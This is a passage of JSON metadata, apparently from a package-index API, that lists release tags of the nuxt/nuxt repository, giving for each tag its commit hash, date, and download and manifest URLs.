88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577a